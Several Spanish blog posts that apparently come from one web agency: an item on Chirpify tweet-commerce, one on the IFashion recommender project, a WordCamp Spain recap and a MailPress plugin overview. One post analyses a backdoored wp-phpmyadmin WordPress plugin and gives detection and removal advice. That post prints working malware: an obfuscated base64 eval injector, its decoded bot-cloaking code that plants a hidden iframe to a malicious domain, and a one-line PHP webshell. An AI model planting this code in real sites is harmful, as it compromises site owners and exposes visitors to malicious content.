Ahora, una plataforma ya lo ha conseguido. Chirpify ha lanzado un sistema que ayudará a las tiendas online a promocionar y comercializar sus productos a través de la red social. Chirpify convierte los tuits en transacciones, permitiendo compras en tiempo real y lo que es más importante, en un sólo paso.

El sistema es simple, y lo es para ambas partes: el comprador registra su cuenta de Twitter en Chirpify, la conecta a PayPal, ofrece una dirección de envío, y a partir de entonces, estará a un sólo tuit de comprar los productos o servicios que ofrezcan las empresas presentes en Chirpify. Cuando una empresa ofrece un producto en Twitter, basta con contestar con la palabra “buy…“  y todo el engranaje de compra se activará. Sin hacer nada más. Es el Ecommerce llevado a la sencillez extrema, y con la seguridad que ofrece este tipo de pagos.

Para las tiendas de Ecommerce, disponemos de una versión gratuita (Basic), con la que tendremos que pagar el 4% de nuestras ventas, comisión de PayPal a parte. Si queremos reducir esa tasa hasta el 2%, podemos pagar 49 dólares al año. Para eliminarla completamente, en el caso de que tengamos una gran facturación, la versión Enterprise nos costará alrededor de 500 dólares mensuales.

El mecanismo es sencillo: se cuelga un tuit con el nombre del producto y una foto, y lo ponemos así al alcance del cliente. Además, se puede integrar a la perfección con nuestra tienda online de la web.

Por fin, estamos ante un sistema para capitalizar los followers que tengamos. Twitter es un escaparate continuo de nuestros productos y nuestra imagen de marca, y vendiendo a través de esta red social estamos creando un círculo que se retroalimenta: los potenciales clientes seguirán nuestra cuenta porque comprar allí será fácil, y entonces podremos dirigirlos también a la tienda online de nuestra web a través de enlaces en los tuits.

En concreto, el proyecto IFashion permitirá la selección e interacción de imágenes o videos al cualquier usuario de Internet, con el objetivo de obtener información, participar en acciones, y tener la posibilidad de comprar productos que esté visualizando en ese momento en el elemento audiovisual.

Este nuevo sistema permitirá realizar el tracking de productos y objetos, con el ambicioso objetivo de conseguir un algoritmo de recomendación de artículos que favorezca el proceso de compra online, aumente la conversión y los ratios de compra, y la satisfacción general del cliente gracias a la sencillez y comodidad en el proceso.

Como innovación a añadir al abanico de recursos en publicidad online, este sistema tendrá la posibilidad de abrir una nueva vía para potenciar el comercio electrónico en España, especialmente en el caso de marcas fabricantes de moda: Complementar la presencia online de las marcas, reforzar acciones de branding, permitir al cliente comprar un producto que esté visualizando en video o imagen en cualquier tipo de plataforma ecommerce son sólo algunas de las posibles aplicaciones que tendrá el proyecto IFashion.

Una de las múltiples integraciones que esta tecnología puede tener lugar lo vemos en sites y comunidades de moda online del estilo de Chicisimo.com (donde las usuarias publican fotos de cómo van vestidas y comparten sus gustos), mediante la integración de la venta de productos en los looks gracias al reconocimiento inteligente de prendas y complementos.

Este tipo de aplicación de la plataforma IFashion no sólo tendrá un uso directo en comercio electrónico, proporcionando un canal orgánico de “social shopping” al convertir a las usuarias en prescriptoras directas de las marcas, si no que presentará múltiples variantes en lo relativo a la explotación de datos que situarán a IFashion como una plataforma altamente atractiva para las marcas.

Más allá del sector de la moda, la plataforma IFashion tiene aplicaciones en otros sectores como el de la electrónica, la alimentación, bricolaje, mobiliario, etc.

En los próximos meses estará disponible una versión beta para plataformas de comercio electrónico de esta tecnología. Estará especialmente indicado para tiendas online con un extenso catálogo, que quieran disponer de un recomendador avanzado de productos para sus clientes. La adaptación e integración se personalizará en cada proyecto estudiando sus características, la clasificación de productos y los atributos que los definen, así como el comportamiento de los usuarios como cross-selling y para conseguir un resultado lejos del alcance de otras herramientas disponibles actualmente en el mercado.

Este proyecto ha sido financiado por el Instituto de la Pequeña y Mediana Industria de la Generalitat Valenciana (IMPIVA) y por el Fondo Europeo de Desarrollo Regional de la Unión Europea (FEDER).

Foto Courtorture

El plugin de wp-phpmyadmin tiene una utilidad importante cuando no tienes acceso de otro modo a la base de datos de tu instalación de WordPress. Pero el precio que se puede pagar por usarlo, después de haber comprobado la vulnerabilidad que trae consigo, es bastante alto.

El plugin no se actualiza desde el 2007 (con wp 1.5), no se puede encontrar en el repositorio oficial de plugins de WordPress (http://wordpress.org/extend/plugins/), y lo más importante: se había conseguido introducir un fichero dentre el resto de ficheros del plugin que abría una puerta trasera a nuestro sistema.

Pero vamos por partes y a explicar cómo funciona este hack de WordPress con detalle:

El ataque consistía en introducir en los ficheros index.php una línea justo detrás del primer <?php . Aquí tenemos un ejemplo:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly8yZ3V2a2w1NW9mLmNvLnR2Lz9nbz0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2lmcmFtZT4nOw0KfQ==');

Este código codificado, daba el siguiente fragmento de php tras decodificarlo, fragmento que acababa pintando un iframe antes de la etiqueta <?html>? en los blog al pasarlo por la función eval():

error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
 array("216.239.32.0","216.239.63.255"),
 array("64.68.80.0"  ,"64.68.87.255"  ),
 array("66.102.0.0",  "66.102.15.255"),
 array("64.233.160.0","64.233.191.255"),
 array("66.249.64.0", "66.249.95.255"),
 array("72.14.192.0", "72.14.255.255"),
 array("209.85.128.0","209.85.255.255"),
 array("198.108.100.192","198.108.100.207"),
 array("173.194.0.0","173.194.255.255"),
 array("216.33.229.144","216.33.229.151"),
 array("216.33.229.160","216.33.229.167"),
 array("209.185.108.128","209.185.108.255"),
 array("216.109.75.80","216.109.75.95"),
 array("64.68.88.0","64.68.95.255"),
 array("64.68.64.64","64.68.64.127"),
 array("64.41.221.192","64.41.221.207"),
 array("74.125.0.0","74.125.255.255"),
 array("65.52.0.0","65.55.255.255"),
 array("74.6.0.0","74.6.255.255"),
 array("67.195.0.0","67.195.255.255"),
 array("72.30.0.0","72.30.255.255"),
 array("38.0.0.0","38.255.255.255")
 );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
 $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
 if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
 if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<iframe src="http://2guvkl55of.co.tv/?go=1" width="1" height="1"></iframe>';
}

Este iframe se intentaba ocultar a los robots de los buscadores y de rastreadores importantes para evitar que saltasen las alarmas de estos, y pusiesen en aviso al dueño del blog mediante alarmas al correo electrónico, bloqueos de su página desde la página de resultados de búsqueda, etc. Así podía permanecer el mayor tiempo posible estando oculto.

El contenido del iframe cargaba una direccion de un servidor (todos los distintos dominios que hemos podido comprobar estaban en Rumanía), donde se podía pintar cualquier cosa, seguramente troyanos javascript que comprometiesen la seguridad del usuario que visitase la web.

Cómo saber si tengo esta puerta trasera en mi sistema, y como solucionarlo (detección, solución y prevención):

- Comprobar si tenemos el plugin de wp-phpmyadmin, y buscar el fichero phpmyadmin/upgrade.php dentro del mismo. Renombrar la extensión o eliminar este fichero, sobre todo si tiene dentro unas instrucciones parecida a estas:

<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>

- Buscar en el resto de ficheros de wp-content la cadena ‘eval(stripslashes‘ (por ejemplo), y comprobar en los resultados si alguno se parece a la línea anterior.

- Mantener una política estricta de permisos sobre los ficheros de la instalación de WordPress. Si los ficheros index.php hubiesen estado correctamente configurados en cuanto a permisos, tal y como aconsejan en http://codex.wordpress.org/Hardening_WordPress la infección se hubiese podido evitar.

- Por supuesto, mantener nuestros plugins actualizados, junto con la última versión de WordPress siempre instalada. Y si alguno de los plugins deja de tener soporte o no se continúa su desarrollo, mejor optar por descartarlo y comenzar a buscar un sustituto del mismo.

Más info:

http://blog.sucuri.net/2011/06/wp-phpmyadmin-wordpress-plugin-delete-it-now.html

http://www.wpsecuritylock.com/wp-phpmyadmin-plugin-hacked-backdoor-vulnerability/

Especial cuidado también con los plugins wptouch, addthis y w3-total-cache:


http://wpmu.org/wordpress-security-exploit-found-upgrade-wptouch-addthis-and-w3-total-cache/

Las ponencias fueron bastante interesantes para todo tipo de perfiles. Bien es cierto que para los usuarios de WordPress algunas fueron demasiado técnicas, y que para los desarrolladores avanzados otras charlas profundizaron poco o carecían de interés. Pero a pesar de que cualquier ponencia tiene cierto grado de autopromoción, ninguna fue un publireportaje.

En la primera, Fernando Tellado nos siguió descubriendo plugins y usos de WordPress curiosos. Fernando siempre está descubriendo a la comunidad hispana de WordPress utilidades y plugins que mucha gente no encontraría porque ni siquiera se plantea buscarlos. Pero él está atento, y desde ayudawordpress.com siempre tiene algo interesante que enseñar. Podéis encontrar la ponencia de Fernando Tellado aquí.

La segunda fue para José Fontainhas, que expuso lo nuevo que viene con WordPress 3.1. Rápida y concisa. Según nos comentó lo mejor para conocer las novedades  de WP3.1 es visitar la página oficial.

Rafael Poveda, de Mecus, nos explicó los entresijos de la creación rápida de temas con la nueva versión de WordPress 3.x. Temas elásticos, frameworks themes y temas hijos. Sobre todo, la idea de no reinventar la rueda creando temas desde cero sin pensar en que podemos aprovechar soluciones existentes mediante el uso de temas hijos, o temas específicos hipercustomizables.  ¡Sólo falta que cuelguen la presentación! Puedes encontrar su presentación aquí.

Después fue el turno para el SeñorMuñoz, Fernando Muñoz, consultor SEO de profesión. Amplió la que nos ofreció el año pasado con unas nociones de SEO básicas pero imprescindibles a la hora de implementar temas de WordPress. Y para rematar nos mostró un amplio abanico de plugins para potenciar el aspecto SEO de un WordPress. Su presentación y su resumen la podéis encontrar en su web.

Tras la comida tuvimos el gusto de escuchar a Luis Rull, de Mecus, hablando de los distintos usos que se le puede dar a WordPress más allá de la creación de blogs. Y qué sorpresa la nuestra cuando presentó el proyecto de Chicisimo.com que con tanta ilusión estamos llevando hacia delante junto con sus creadores, Gabriel Aldamiz y su mujer María Arenaza. No nos cansaremos de agradecer a Luis que pusiese a chicisimo.com como ejemplo de uso de extremo de WordPress para crear una comunidad alrededor de un nexo común para sus usuarios, como es la moda. Además nos enseño otros sites que usan WordPress, aunque no lo parezca. Su presentación, en su blog personal.

Isaac Keyet, cofundador de IntenseDebate y ahora Coordinador del equipo de trabajo de desarrollos para dispositivos móviles de Automattic, nos introdujo a los temas específicos para este tipo de dispositivos y las herramientas principales que tenemos a nuestra disposición para usar WordPress en ellos.

Luego Karim Osman, también de Automattic, nos dio algunas pinceladas de los entresijos de una gran empresa como Automattic, de su historia y de hacia donde navegan en la actualidad. Siempre interesante que alguien tan simpático como Karim venga y te cuente como funciona una empresa que se ha hecho tan grande e importante en tan poco tiempo. Para tomar nota. Su presentación la podéis encontrar en su web.

Y por fin Fernando Serer, con su tan aplaudida ponencia (sobre todo en Twitter) sobre WordPress y el comercio electrónico. Temas y plugins para vender con WordPress. Que está claro que no es la misión de la plataforma en convertirse en un framework de tiendas online, pero para desarrollos rápidos, aprovechando quizás un site con Worpdress con cantidad de visitas, para crear tiendas con multitud de landing pages, es una cuestión a tener en cuenta. Y más después de tener en las manos el profundo análisis que expuso Fernando Serer y que realizaron en Blogestudio. Muy muy interesante. Superrecomendable ver la presentación en slideshare.

Jeffrey Pearce nos mostró su gran plugin WooThumbBlog, que forma parte de muchos temas que tienen a la venta en Woothemes. Jeffrey es un programador excepcional, y un tío muy simpático. Gracias a él nos vinimos con una camiseta de Woothemes, con un posible acuerdo para colaborar con ellos creando nuevos temas, y con un descuento del 30% en su plataforma Su presentación, en su web.

Y por último Rocío Valdivia nos enseñó como crear plugins multilenguaje desde cero y de una forma muy sencilla. Seguro que mucha gente perdió el miedo a crear su propio plugins, y alguno que incluía nueva funcionalidad en el tema ahora usará sus propios plugins a partir de ahora. Faltó tiempo para hacer una demostración en vivo, pero fue una ponencia muy interesante que podéis encontrar aquí.

Para finalizar, queremos darle nuestro agradecimiento a la gente de Packet Loss (Raúl Illana, Ismael Charif, Ricard Torres, etc etc) por hacer posible la Wordcamp en España y por el éxito de organización de este año. Y por supuesto a Cavalleto (su flickr) por ser testigo con su cámara y por permitirnos usar las fotos del evento.

Mailpress presenta un completo sistema de control de suscripciones by mail, listas de correo, envíos por lotes, autoresponders, tracking de acciones sobre los correos enviados, etc. Además, si configuramos una plantilla con el estilo de nuestro blog, todos los correos de confirmación de cuenta, cambio de contraseña, etc, que se mandan desde WordPress tendrán ahora este nuevo estilo establecido desde Mailpress, manteniendo la imagen corporativa en la comunicación con los usuarios.

Y es que Mailpress se compone de un plugin principal, y distintos plugins a modo de addons que extienden la funcionalidad de este. Y son estos añadidos los que hacen que Mailpress ofrezca grandes posibilidades a la comunidad de WordPress. Os presentamos un listado de lo que están disponible a fecha de 08 de Octubre de 2009, con una breve explicación de su funcionalidad:

• Autoresponder: Son correos redactados previamente (guardados como borrador), que serán enviados dependiendo de los eventos o acciones que realicen los usuarios (respuesta a un alta en la suscripción, a una baja, etc). Funciona con wp_cron.
• Batch send: Permite configurar el envío por lotes de correos para grandes cantidades de usuarios, evitando saturar el servidor y que nos pueda perjudicar una identificación como posible spam.
• Bounces: Nos facilita la labor de control de los correos que no llegan a sus destinatarios.
• Bulk import: Añade un sencillo formulario en el listado de usuarios para introducir de forma rápida nuevos emails.
• Filter img: Nos evita el dolor de cabeza que algunos clientes de correo como gmail o hotmail nos dan con su tratamiento de imágenes y css en los correos.
• Form: Incluye la creación de formularios para suscribirse, y poder así mandar diferentes mensajes personalizados.
• Import: Permite importar listas de correo en formato csv y xmlsample, y desde los plugins suscribe2 y suscribe to comments.
• Mailing list: Nos brinda la posibilidad de gestionar listas de correo.
• Newsletter categories: Añade una categorización sobre las suscripciones, permitiendo configurar la suscripción a cada tipo de contenido por post, día, semana, mes, etc.
• Phpmail: Cambia el envío desde smtp a la función native de php mail.
• Roles and capabilities: Para configurar los permisos sobre Mailpress para cada rol de WordPress.
• Sendmail: Cambia el envío de smtp a sendmail.
• Sync wordpress user: Sincroniza usuarios de wordpress y de Mailpress, y permite apuntarse a suscripciones desde el formulario de registro de wordpress.
• Tracking: Potentísima función que ofrece la posibilidad de realizar un seguimiento al detalle de las acciones que se realizan sobre los mails que enviamos con Mailpress.
• Upload media: Añade la opción de incorporar elementos multimedia a los correos, opción que no viene habilitado por defecto.
• View logs: Muestra de forma sencilla y sin salir del administrador los logs relacionados con Mailpress.

Más info en la página del plugin: www.mailpress.org

Actualización: Si queremos añadir el formulario de suscripción a nuestro WordPress, bien tenemos que añadir el widget de mailpress o bien pegar un código parecido a este en la parte que queramos de nuestra plantilla:

<div class="modulo enlaces">
    <p class="tit-sidebar">Suscríbete a nuestro boletín</p>
    <ul class="bloque">
        <?php if (class_exists('MailPress')) MailPress::form(array('urlsubmgt'=>1, 'txtbutton' => 'Suscribirse', 'txtsubmgt' => 'Gestionar suscripción' )); ?>
    </ul>
</div>